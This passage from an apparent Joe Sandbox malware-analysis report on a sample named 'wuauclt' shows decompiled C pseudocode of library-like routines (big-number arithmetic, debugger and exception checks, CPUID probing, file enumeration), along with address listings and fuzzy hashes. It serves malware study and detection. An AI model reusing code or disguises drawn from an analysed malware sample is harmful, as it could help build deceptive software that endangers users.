															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t190 =  &_v16; // 0x26414b
									_t309 =  *_t190 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t274 =  &(_t262[_t204 + 1]);
										do {
											 *_t274 = 0;
											_t274 =  &(_t274[1]);
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t295 = _t328[1];
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t25 =  &_v16; // 0x26414b
										_t250 =  *_t25 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E002674A0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00260330(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00260330(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00260330(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}
























































































                                                0x00262b3c
                                                0x00262b3f
                                                0x00262b43
                                                0x00262b4d
                                                0x00262b4d
                                                0x00262b50
                                                0x00262b52
                                                0x00262b54
                                                0x00262b61
                                                0x00262b61
                                                0x00262b64
                                                0x00262b64
                                                0x00262b67
                                                0x00262b6a
                                                0x00262b6c
                                                0x00262c9f
                                                0x00262ca1
                                                0x00262cea
                                                0x00262cee
                                                0x00262cf4
                                                0x00262ca3
                                                0x00262ca5
                                                0x00262ca8
                                                0x00262caa
                                                0x00262cad
                                                0x00262caf
                                                0x00262cb1
                                                0x00262ce5
                                                0x00262ce5
                                                0x00262ce5
                                                0x00262cb3
                                                0x00262cb8
                                                0x00262cbe
                                                0x00262cbe
                                                0x00262cc1
                                                0x00262cc3
                                                0x00262cc5
                                                0x00000000
                                                0x00000000
                                                0x00262cc7
                                                0x00262cc8
                                                0x00262ccb
                                                0x00262cce
                                                0x00262cd0
                                                0x00000000
                                                0x00262cd2
                                                0x00000000
                                                0x00262cd2
                                                0x00000000
                                                0x00262cd0
                                                0x00262cd4
                                                0x00262cd4
                                                0x00262cd9
                                                0x00262cdf
                                                0x00262ce3
                                                0x00000000
                                                0x00000000
                                                0x00262ce3
                                                0x00262ce6
                                                0x00262ce6
                                                0x00262ce8
                                                0x00262cf5
                                                0x00262cf8
                                                0x00262cf8
                                                0x00262cfb
                                                0x00262cfe
                                                0x00262d02
                                                0x00262d05
                                                0x00262d08
                                                0x00262d0b
                                                0x00262d16
                                                0x00262d0d
                                                0x00262d12
                                                0x00262d12
                                                0x00262d20
                                                0x00262d25
                                                0x00262d28
                                                0x00262d2a
                                                0x00262d34
                                                0x00262d37
                                                0x00262d3e
                                                0x00262d41
                                                0x00262d44
                                                0x00262d46
                                                0x00262d52
                                                0x00262d52
                                                0x00262d52
                                                0x00262d52
                                                0x00262d44
                                                0x00262d57
                                                0x00262d5e
                                                0x00262d5e
                                                0x00262d61
                                                0x00262d64
                                                0x00262f96
                                                0x00262f96
                                                0x00262d6a
                                                0x00262d6a
                                                0x00262d70
                                                0x00262d73
                                                0x00262d76
                                                0x00262d79
                                                0x00262d7c
                                                0x00262d7f
                                                0x00262d82
                                                0x00262d82
                                                0x00262d82
                                                0x00262d85
                                                0x00262d8c
                                                0x00262d8c
                                                0x00262d87
                                                0x00262d87
                                                0x00262d87
                                                0x00262d8e
                                                0x00262d92
                                                0x00262d95
                                                0x00262d97
                                                0x00262d9a
                                                0x00262da1
                                                0x00262da4
                                                0x00262da7
                                                0x00262db2
                                                0x00262db5
                                                0x00262dba
                                                0x00262dbf
                                                0x00262dc6
                                                0x00262dcb
                                                0x00262dcd
                                                0x00262dcf
                                                0x00262dd3
                                                0x00262dd6
                                                0x00262dd9
                                                0x00262de1
                                                0x00262dea
                                                0x00262dea
                                                0x00262dec
                                                0x00262def
                                                0x00262def
                                                0x00262dd9
                                                0x00262df9
                                                0x00262dfe
                                                0x00262e03
                                                0x00262e05
                                                0x00262e08
                                                0x00262e0a
                                                0x00262e0d
                                                0x00262e10
                                                0x00262e12
                                                0x00262e15
                                                0x00262e18
                                                0x00262e1a
                                                0x00262e21
                                                0x00262e26
                                                0x00262e29
                                                0x00262e33
                                                0x00262e35
                                                0x00262e37
                                                0x00262e3a
                                                0x00262e3a
                                                0x00262e3c
                                                0x00262e3f
                                                0x00262e42
                                                0x00262e45
                                                0x00262e48
                                                0x00262e1c
                                                0x00262e1c
                                                0x00262e1f
                                                0x00000000
                                                0x00000000
                                                0x00262e1f
                                                0x00262e4b
                                                0x00262e4d
                                                0x00262e4f
                                                0x00000000
                                                0x00262e51
                                                0x00262e51
                                                0x00262e54
                                                0x00262e56
                                                0x00262e56
                                                0x00262e64
                                                0x00262e67
                                                0x00262e6c
                                                0x00262e6e
                                                0x00000000
                                                0x00000000
                                                0x00262e70
                                                0x00262e77
                                                0x00262e77
                                                0x00262e7a
                                                0x00262e7d
                                                0x00262e80
                                                0x00262e83
                                                0x00262e83
                                                0x00262e86
                                                0x00262e89
                                                0x00262e8d
                                                0x00262e90
                                                0x00262e92
                                                0x00262e95
                                                0x00000000
                                                0x00000000
                                                0x00262e97
                                                0x00262e95
                                                0x00262e72
                                                0x00262e72
                                                0x00262e75
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00262e75
                                                0x00262e9c
                                                0x00262e9c
                                                0x00000000
                                                0x00262e9c
                                                0x00262e99
                                                0x00000000
                                                0x00262e99
                                                0x00262e54
                                                0x00262e4f
                                                0x00262e9f
                                                0x00262e9f
                                                0x00262ea1
                                                0x00262eab
                                                0x00262eab
                                                0x00262eae
                                                0x00262eb0
                                                0x00262eb2
                                                0x00262eb4
                                                0x00262eb6
                                                0x00262eb9
                                                0x00262ebc
                                                0x00262ebc
                                                0x00262ebf
                                                0x00262ec2
                                                0x00262ec5
                                                0x00262ec7
                                                0x00262edc
                                                0x00262ede
                                                0x00262ee0
                                                0x00262ee2
                                                0x00262ee4
                                                0x00262ee6
                                                0x00262ee8
                                                0x00262eea
                                                0x00262eed
                                                0x00262eed
                                                0x00262ef1
                                                0x00262ef3
                                                0x00262ef9
                                                0x00262efc
                                                0x00262efc
                                                0x00262efc
                                                0x00262f00
                                                0x00262f00
                                                0x00262f05
                                                0x00262f08
                                                0x00262f08
                                                0x00262f0d
                                                0x00262f0f
                                                0x00262f11
                                                0x00262f18
                                                0x00262f18
                                                0x00262f1a
                                                0x00262f1c
                                                0x00262f1f
                                                0x00262f21
                                                0x00262f24
                                                0x00262f24
                                                0x00262f27
                                                0x00262f30
                                                0x00262f30
                                                0x00262f32
                                                0x00262f37
                                                0x00262f3d
                                                0x00262f41
                                                0x00262f44
                                                0x00262f47
                                                0x00262f49
                                                0x00262f49
                                                0x00262f49
                                                0x00262f4e
                                                0x00262f4e
                                                0x00262f51
                                                0x00262f54
                                                0x00262f13
                                                0x00262f13
                                                0x00262f16
                                                0x00000000
                                                0x00000000
                                                0x00262f16
                                                0x00262f11
                                                0x00262f5b
                                                0x00262f5b
                                                0x00262f5c
                                                0x00262ea3
                                                0x00262ea3
                                                0x00262ea5
                                                0x00000000
                                                0x00000000
                                                0x00262ea5
                                                0x00262f6c
                                                0x00262f71
                                                0x00262f74
                                                0x00262f78
                                                0x00262f79
                                                0x00262f7c
                                                0x00262f7f
                                                0x00262f80
                                                0x00262f83
                                                0x00262f86
                                                0x00262f89
                                                0x00262f8c
                                                0x00262f8c
                                                0x00262f94
                                                0x00262f98
                                                0x00262f9b
                                                0x00262f9c
                                                0x00262f9e
                                                0x00262fa0
                                                0x00262fa5
                                                0x00262fb0
                                                0x00262fb0
                                                0x00262fb6
                                                0x00262fb9
                                                0x00262fba
                                                0x00262fba
                                                0x00262fb0
                                                0x00262fbe
                                                0x00262fc0
                                                0x00262fc2
                                                0x00262fc4
                                                0x00262fc4
                                                0x00262fc6
                                                0x00262fca
                                                0x00000000
                                                0x00000000
                                                0x00262fcc
                                                0x00262fcc
                                                0x00262fcf
                                                0x00262fd1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00262fd1
                                                0x00262fc4
                                                0x00262fd3
                                                0x00262fdd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00262ce8
                                                0x00262b72
                                                0x00262b72
                                                0x00262b75
                                                0x00262b78
                                                0x00262b7b
                                                0x00262bac
                                                0x00262bae
                                                0x00262bf9
                                                0x00262bfb
                                                0x00262c02
                                                0x00262c09
                                                0x00262c0c
                                                0x00262c0f
                                                0x00262c11
                                                0x00262c15
                                                0x00262c15
                                                0x00262c16
                                                0x00262c19
                                                0x00262c20
                                                0x00262c29
                                                0x00262c2e
                                                0x00262c31
                                                0x00262c36
                                                0x00262c39
                                                0x00262c3b
                                                0x00262c40
                                                0x00262c43
                                                0x00262c46
                                                0x00262c46
                                                0x00262c46
                                                0x00262c4a
                                                0x00262c4d
                                                0x00262c4d
                                                0x00262c52
                                                0x00262c52
                                                0x00262c5d
                                                0x00262c68
                                                0x00262c68
                                                0x00262c6b
                                                0x00262c77
                                                0x00262c7c
                                                0x00262c87
                                                0x00262c89
                                                0x00262c8b
                                                0x00262c91
                                                0x00262c96
                                                0x00262c98
                                                0x00262c9e
                                                0x00262bb0
                                                0x00262bbc
                                                0x00262bbc
                                                0x00262bbf
                                                0x00262bcf
                                                0x00262bd5
                                                0x00262bdc
                                                0x00262bde
                                                0x00262be6
                                                0x00262be8
                                                0x00262bea
                                                0x00262bef
                                                0x00262bf2
                                                0x00262bf8
                                                0x00262bf8
                                                0x00262b7d
                                                0x00262b80
                                                0x00262b84
                                                0x00262b8a
                                                0x00262b99
                                                0x00262ba3
                                                0x00262bab
                                                0x00262bab
                                                0x00262b7b
                                                0x00262b56
                                                0x00262b59
                                                0x00262b5f
                                                0x00262b5f
                                                0x00262b45
                                                0x00262b4b
                                                0x00262b4b

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: KA&$KA&
                                                • API String ID: 0-957701217
                                                • Opcode ID: 3c569044e724ec21582325f2e63df1ee0d1dc8a02a4197ac015f39958211d29e
                                                • Instruction ID: 7607410826a597a98fdcb7cefe2d13b3c8d0ca404d465e80f632eb66c19f790c
                                                • Opcode Fuzzy Hash: 3c569044e724ec21582325f2e63df1ee0d1dc8a02a4197ac015f39958211d29e
                                                • Instruction Fuzzy Hash: 6D023C71E1061ADBDF14CFA9C8806AEB7F5FF88314F25816AD819E7384D731A9958B80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025B888 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E0025B888(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x271004; // 0x80aab37c
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00257AFB(_t41);
					_pop(_t62);
				}
				E002596C0(_t67,  &_v804, 0, 0x50);
				E002596C0(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00257AFB(_t57);
				}
				return E00257097(_v8 ^ _t70, _t69);
			}




































                                                0x0025b888
                                                0x0025b888
                                                0x0025b888
                                                0x0025b888
                                                0x0025b893
                                                0x0025b898
                                                0x0025b89a
                                                0x0025b8a2
                                                0x0025b8a4
                                                0x0025b8a7
                                                0x0025b8ac
                                                0x0025b8ac
                                                0x0025b8b8
                                                0x0025b8cb
                                                0x0025b8d9
                                                0x0025b8df
                                                0x0025b8e5
                                                0x0025b8eb
                                                0x0025b8f1
                                                0x0025b8f7
                                                0x0025b8fd
                                                0x0025b903
                                                0x0025b909
                                                0x0025b90f
                                                0x0025b916
                                                0x0025b91d
                                                0x0025b924
                                                0x0025b92b
                                                0x0025b932
                                                0x0025b939
                                                0x0025b93a
                                                0x0025b943
                                                0x0025b949
                                                0x0025b94c
                                                0x0025b952
                                                0x0025b95f
                                                0x0025b968
                                                0x0025b971
                                                0x0025b97a
                                                0x0025b988
                                                0x0025b98a
                                                0x0025b99f
                                                0x0025b9ab
                                                0x0025b9ae
                                                0x0025b9b3
                                                0x0025b9c2

                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0025B980
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0025B98A
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0025B997
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 5d64911ff69d5314fda72c462975e1cd82d3b118654b5ff42b89fbf091b0881f
                                                • Instruction ID: a42e8e60276f1b256e78cc7edd89c843e4381e54b624f50f29016cd8bca595ec
                                                • Opcode Fuzzy Hash: 5d64911ff69d5314fda72c462975e1cd82d3b118654b5ff42b89fbf091b0881f
                                                • Instruction Fuzzy Hash: F031C47591121D9BCB21DF68D989B9CBBB8BF18311F5041EAE80CA7250EB709F95CF48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00257BDE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E00257BDE(intOrPtr __edx) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t78;
				intOrPtr _t83;
				intOrPtr* _t85;
				signed int _t86;
				signed int _t89;

				_t83 = __edx;
				 *0x273874 =  *0x273874 & 0x00000000;
				 *0x271010 =  *0x271010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x271010 =  *0x271010 | 0x00000002;
				 *0x273874 = 1;
				_t85 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t85 = 0;
				 *((intOrPtr*)(_t85 + 4)) = 1;
				 *((intOrPtr*)(_t85 + 8)) = 0;
				 *((intOrPtr*)(_t85 + 0xc)) = _t83;
				_v16 = _v48;
				_t51 = 1;
				asm("sbb cl, cl");
				_t78 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t85 = _t51;
				 *((intOrPtr*)(_t85 + 4)) = _t67;
				 *((intOrPtr*)(_t85 + 8)) = _t78;
				 *((intOrPtr*)(_t85 + 0xc)) = _t83;
				if( ~(_v36 ^ 0x49656e69 | _v40 ^ 0x6c65746e | _v44 ^ 0x756e6547) + 1 == 0) {
					L9:
					_t86 =  *0x273878; // 0x2
					L10:
					_v32 = _v36;
					_t53 = _v40;
					_v12 = _t53;
					_v28 = _t53;
					if(_v16 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v48;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t83;
						_t60 = _v44;
						_v24 = _t60;
						_t53 = _v12;
						if((_t60 & 0x00000200) != 0) {
							 *0x273878 = _t86 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0x271010 =  *0x271010 | 0x00000004;
						 *0x273874 = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t53;
							_v16 = _t83;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0x271010; // 0x2f
								_t57 = _t56 | 0x00000008;
								 *0x273874 = 3;
								 *0x271010 = _t57;
								if((_v24 & 0x00000020) != 0) {
									 *0x273874 = 5;
									 *0x271010 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v48 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t89 =  *0x273878; // 0x2
					_t86 = _t89 | 0x00000001;
					 *0x273878 = _t86;
					goto L10;
				} else {
					goto L9;
				}
			}




























                                                0x00257bde
                                                0x00257be1
                                                0x00257bef
                                                0x00257bfe
                                                0x00257d78
                                                0x00257d7e
                                                0x00257d7e
                                                0x00257c04
                                                0x00257c0a
                                                0x00257c15
                                                0x00257c1b
                                                0x00257c1e
                                                0x00257c1f
                                                0x00257c23
                                                0x00257c24
                                                0x00257c26
                                                0x00257c29
                                                0x00257c2c
                                                0x00257c35
                                                0x00257c56
                                                0x00257c57
                                                0x00257c5e
                                                0x00257c5f
                                                0x00257c60
                                                0x00257c64
                                                0x00257c65
                                                0x00257c67
                                                0x00257c6a
                                                0x00257c6d
                                                0x00257c70
                                                0x00257cb5
                                                0x00257cb5
                                                0x00257cbb
                                                0x00257cc2
                                                0x00257cc5
                                                0x00257cc8
                                                0x00257ccb
                                                0x00257cce
                                                0x00257cd2
                                                0x00257cd5
                                                0x00257cd6
                                                0x00257cdb
                                                0x00257cde
                                                0x00257ce0
                                                0x00257ce3
                                                0x00257ce6
                                                0x00257ce9
                                                0x00257cf1
                                                0x00257cf4
                                                0x00257cf7
                                                0x00257cfc
                                                0x00257cfc
                                                0x00257cf7
                                                0x00257d09
                                                0x00257d0b
                                                0x00257d12
                                                0x00257d21
                                                0x00257d2c
                                                0x00257d2f
                                                0x00257d32
                                                0x00257d43
                                                0x00257d49
                                                0x00257d4e
                                                0x00257d51
                                                0x00257d5f
                                                0x00257d64
                                                0x00257d69
                                                0x00257d73
                                                0x00257d73
                                                0x00257d64
                                                0x00257d43
                                                0x00257d21
                                                0x00000000
                                                0x00257d09
                                                0x00257c75
                                                0x00257c7f
                                                0x00257ca4
                                                0x00257caa
                                                0x00257cad
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00257BF7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-3916222277
                                                • Opcode ID: 3649732bce4eb34b4fe097e4e2fd486cc3cd2307a75267bdaf245d64d39fdbfa
                                                • Instruction ID: 610ba6ab97c1e630bc286104fe262cc8adf766caaab62d61e54fa490b8272956
                                                • Opcode Fuzzy Hash: 3649732bce4eb34b4fe097e4e2fd486cc3cd2307a75267bdaf245d64d39fdbfa
                                                • Instruction Fuzzy Hash: 3051C471D152069BEB14CF69F88A7AEBBF0FF04312F14816AE819E7250D374AA94CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025F89F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E0025F89F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __esi;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t110;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				void* _t114;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E0025D3BF(_t85, _t78, 1);
					_t87 = _t110;
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E002648FB(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0025FADE(_a16, __eflags, _t111);
							E0025D2F4(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E002648FB(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0025BA7F();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x271004; // 0x80aab37c
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00264950(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E002596C0(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0025F89F(_t79, _t93, _t106,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
